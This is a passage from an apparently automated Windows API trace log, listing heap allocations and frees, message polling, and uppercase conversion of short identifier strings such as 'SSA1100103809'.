(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa630 [0211.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0211.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x115b) returned 0x2a9cc10 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0211.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0211.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0211.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0211.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0211.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0211.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0211.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0211.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0211.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0211.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0211.084] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0211.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0211.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0211.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0211.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0211.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0211.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.086] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.086] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.086] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.086] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.086] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.086] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.086] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0211.086] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0211.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.087] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.087] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f68 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.087] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.087] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.087] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.087] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0211.088] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0211.088] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0211.088] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.088] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74238 | out: hHeap=0x2af0000) returned 1 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0211.088] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.089] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0211.089] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0211.089] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0211.089] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.089] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0211.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: 